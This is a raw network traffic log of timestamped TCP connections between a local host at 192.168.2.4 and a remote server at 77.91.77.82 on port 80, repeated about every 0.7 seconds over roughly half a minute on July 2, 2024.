                                            Jul 2, 2024 08:29:48.075809002 CEST6412480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.191943884 CEST6412480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.192254066 CEST6412580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.197304010 CEST806412577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.197364092 CEST6412580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.197887897 CEST6412580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.198050976 CEST806412477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.198098898 CEST6412480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.202617884 CEST806412577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.892961979 CEST806412577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.893196106 CEST6412580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.895775080 CEST6412580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.896105051 CEST6412680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.901014090 CEST806412577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.901115894 CEST6412580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.901659966 CEST806412677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:48.901758909 CEST6412680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.902126074 CEST6412680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:48.907219887 CEST806412677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:49.634030104 CEST806412677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:49.634114027 CEST6412680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:49.753701925 CEST6412680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:49.754126072 CEST6412780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:49.758867979 CEST806412677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:49.758915901 CEST6412680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:49.759066105 CEST806412777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:49.759139061 CEST6412780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:49.759399891 CEST6412780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:49.766308069 CEST806412777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:50.448559046 CEST806412777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:50.448628902 CEST6412780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:50.451953888 CEST6412780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:50.452362061 CEST6412880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:50.457191944 CEST806412777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:50.457248926 CEST6412780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:50.457628965 CEST806412877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:50.457695007 CEST6412880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:50.457988024 CEST6412880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:50.463208914 CEST806412877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.155539989 CEST806412877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.156105042 CEST6412880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.268613100 CEST6412880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.268620968 CEST6412980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.273509979 CEST806412977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.274468899 CEST806412877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.274548054 CEST6412880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.274549961 CEST6412980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.274760962 CEST6412980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.279882908 CEST806412977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.969928026 CEST806412977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.969981909 CEST6412980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.973177910 CEST6412980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.973548889 CEST6413080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.978718042 CEST806413077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.978769064 CEST6413080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.978877068 CEST806412977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:51.978920937 CEST6412980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.978934050 CEST6413080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:51.983781099 CEST806413077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:52.680711985 CEST806413077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:52.684210062 CEST6413080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:52.799526930 CEST6413080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:52.800035000 CEST6413180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:52.804645061 CEST806413077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:52.804893017 CEST806413177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:52.804977894 CEST6413180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:52.805001020 CEST6413080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:52.805299044 CEST6413180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:52.810115099 CEST806413177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:53.494653940 CEST806413177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:53.496134996 CEST6413180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:53.498910904 CEST6413180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:53.498909950 CEST6413280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:53.503746033 CEST806413277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:53.503926039 CEST806413177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:53.504028082 CEST6413180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:53.504030943 CEST6413280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:53.504209995 CEST6413280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:53.508982897 CEST806413277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:54.207674026 CEST806413277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:54.207782030 CEST6413280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:54.320782900 CEST6413280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:54.321115971 CEST6413380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:54.326752901 CEST806413277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:54.326811075 CEST6413280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:54.326852083 CEST806413377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:54.326915026 CEST6413380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:54.327965975 CEST6413380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:54.333043098 CEST806413377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.035343885 CEST806413377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.036132097 CEST6413380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.041125059 CEST6413380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.041125059 CEST6413480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.045924902 CEST806413477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.046116114 CEST6413480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.046279907 CEST6413480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.046298981 CEST806413377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.046631098 CEST6413380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.051029921 CEST806413477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.747632027 CEST806413477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.747688055 CEST6413480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.863790989 CEST6413480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.864074945 CEST6413580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.868782997 CEST806413577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.868833065 CEST6413580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.869066000 CEST806413477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:55.869112015 CEST6413480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.869265079 CEST6413580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:55.874811888 CEST806413577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:56.565846920 CEST806413577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:56.565918922 CEST6413580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:56.569580078 CEST6413580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:56.569924116 CEST6413680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:56.574667931 CEST806413577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:56.574712992 CEST6413580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:56.575001001 CEST806413677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:56.575057983 CEST6413680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:56.575467110 CEST6413680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:56.580312014 CEST806413677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:57.289666891 CEST806413677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:57.289791107 CEST6413680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:57.397763968 CEST6413680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:57.398081064 CEST6413780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:57.407983065 CEST806413677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:57.407999039 CEST806413777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:57.408090115 CEST6413780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:57.408097982 CEST6413680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:57.408361912 CEST6413780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:57.416070938 CEST806413777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.125746012 CEST806413777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.125802040 CEST6413780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.129831076 CEST6413780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.130245924 CEST6413880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.135332108 CEST806413777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.135381937 CEST6413780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.135581970 CEST806413877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.135642052 CEST6413880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.135823965 CEST6413880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.140996933 CEST806413877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.850991964 CEST806413877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.851062059 CEST6413880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.956130981 CEST6413880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.956131935 CEST6413980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.961163998 CEST806413977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.961256027 CEST6413980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.961432934 CEST6413980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.961846113 CEST806413877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:58.961946964 CEST6413880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:58.966662884 CEST806413977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:59.657428026 CEST806413977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:59.657493114 CEST6413980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:59.660670996 CEST6413980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:59.661083937 CEST6414080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:59.665992022 CEST806414077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:59.666064978 CEST6414080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:59.666188955 CEST6414080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:59.666353941 CEST806413977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:59.666400909 CEST6413980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:59.671459913 CEST806414077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:00.359883070 CEST806414077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:00.359932899 CEST6414080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:00.472503901 CEST6414080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:00.472872972 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:00.477497101 CEST806414077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:00.477545977 CEST6414080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:00.477781057 CEST806414177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:00.477844954 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:00.477956057 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:00.482763052 CEST806414177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:01.762351036 CEST806414177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:01.762373924 CEST806414177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:01.762429953 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.762429953 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.762507915 CEST806414177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:01.762547970 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.767349005 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.767647028 CEST6414280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.772532940 CEST806414277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:01.772599936 CEST6414280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.772926092 CEST806414177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:01.772974014 CEST6414180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.774061918 CEST6414280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:01.779026031 CEST806414277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:02.464576006 CEST806414277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:02.464629889 CEST6414280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:02.581629038 CEST6414280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:02.581989050 CEST6414380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:02.586813927 CEST806414377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:02.586877108 CEST6414380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:02.587104082 CEST6414380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:02.587152004 CEST806414277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:02.587202072 CEST6414280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:02.591938972 CEST806414377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:03.314081907 CEST806414377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:03.314245939 CEST6414380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:03.317159891 CEST6414380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:03.317158937 CEST6414480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:03.322376013 CEST806414377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:03.322470903 CEST6414380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:03.322515965 CEST806414477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:03.322844982 CEST6414480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:03.323054075 CEST6414480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:03.327815056 CEST806414477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.012676954 CEST806414477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.012727022 CEST6414480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.129000902 CEST6414480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.129362106 CEST6414580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.134236097 CEST806414477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.134291887 CEST6414480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.134438038 CEST806414577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.134521008 CEST6414580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.134807110 CEST6414580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.139918089 CEST806414577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.821544886 CEST806414577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.824692965 CEST6414580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.826731920 CEST6414580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.826731920 CEST6414680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.831624031 CEST806414677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.831897020 CEST806414577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:04.831990004 CEST6414580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.831990004 CEST6414680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.832222939 CEST6414680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:04.836924076 CEST806414677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:05.537697077 CEST806414677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:05.537775040 CEST6414680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:05.644540071 CEST6414680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:05.644937992 CEST6414780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:05.649790049 CEST806414777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:05.649806976 CEST806414677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:05.649857044 CEST6414780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:05.649878979 CEST6414680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:05.650134087 CEST6414780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:05.654979944 CEST806414777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:06.344058037 CEST806414777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:06.344108105 CEST6414780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:06.346911907 CEST6414780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:06.347313881 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:06.352380991 CEST806414877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:06.352478981 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:06.352498055 CEST806414777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:06.352543116 CEST6414780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:06.352627993 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:06.357434034 CEST806414877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.091814995 CEST806414877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.095009089 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.205739975 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.206079006 CEST6414980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.299156904 CEST806414877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.299287081 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.300038099 CEST806414977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.300280094 CEST806414877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.300374985 CEST6414880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.300370932 CEST6414980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.304035902 CEST6414980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.308763981 CEST806414977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.672507048 CEST6414980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.675995111 CEST6415080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.680741072 CEST806415077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:07.680804968 CEST6415080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.681133986 CEST6415080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:07.685868025 CEST806415077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:08.372216940 CEST806415077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:08.372294903 CEST6415080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:08.488877058 CEST6415080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:08.489279985 CEST6415180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:08.494025946 CEST806415077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:08.494054079 CEST806415177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:08.494075060 CEST6415080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:08.494127035 CEST6415180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:08.494445086 CEST6415180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:08.499178886 CEST806415177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:09.200196981 CEST806415177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:09.200314999 CEST6415180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:09.203345060 CEST6415180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:09.205236912 CEST6415280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:09.208379030 CEST806415177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:09.208453894 CEST6415180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:09.210042953 CEST806415277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:09.210177898 CEST6415280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:09.210501909 CEST6415280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:09.215459108 CEST806415277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:09.897491932 CEST806415277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:09.897548914 CEST6415280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.004553080 CEST6415280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.004952908 CEST6415380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.009732008 CEST806415277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:10.009783983 CEST6415280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.010113001 CEST806415377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:10.010179996 CEST6415380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.010441065 CEST6415380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.015957117 CEST806415377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:10.715032101 CEST806415377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:10.715109110 CEST6415380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.717761040 CEST6415380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.718076944 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.722923994 CEST806415477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:10.723009109 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.723016024 CEST806415377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:10.723270893 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.723287106 CEST6415380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:10.728054047 CEST806415477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:11.988368988 CEST806415477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:11.988393068 CEST806415477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:11.988404036 CEST806415477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:11.988424063 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:11.988464117 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:11.988464117 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:12.112678051 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:12.113061905 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:12.118639946 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:12.118715048 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:12.118756056 CEST806415477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:12.118884087 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:12.118957043 CEST6415480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:12.123881102 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.716118097 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.719291925 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.719311953 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.719382048 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.719726086 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.719773054 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.720000982 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.720129013 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.723347902 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.723927021 CEST6415680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.730252981 CEST806415677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.730320930 CEST6415680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.730573893 CEST806415577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:13.730635881 CEST6415680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.730664968 CEST6415580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:13.735500097 CEST806415677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:14.418998003 CEST806415677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:14.419132948 CEST6415680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.534117937 CEST6415680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.534493923 CEST6415780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.539257050 CEST806415777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:14.539360046 CEST6415780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.539542913 CEST6415780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.539804935 CEST806415677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:14.540031910 CEST6415680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.544539928 CEST806415777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:14.547159910 CEST6415780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.549264908 CEST6415880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.554070950 CEST806415877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:14.554147959 CEST6415880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.554363012 CEST6415880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:30:14.559077024 CEST806415877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:30:15.249349117 CEST806415877.91.77.82192.168.2.4
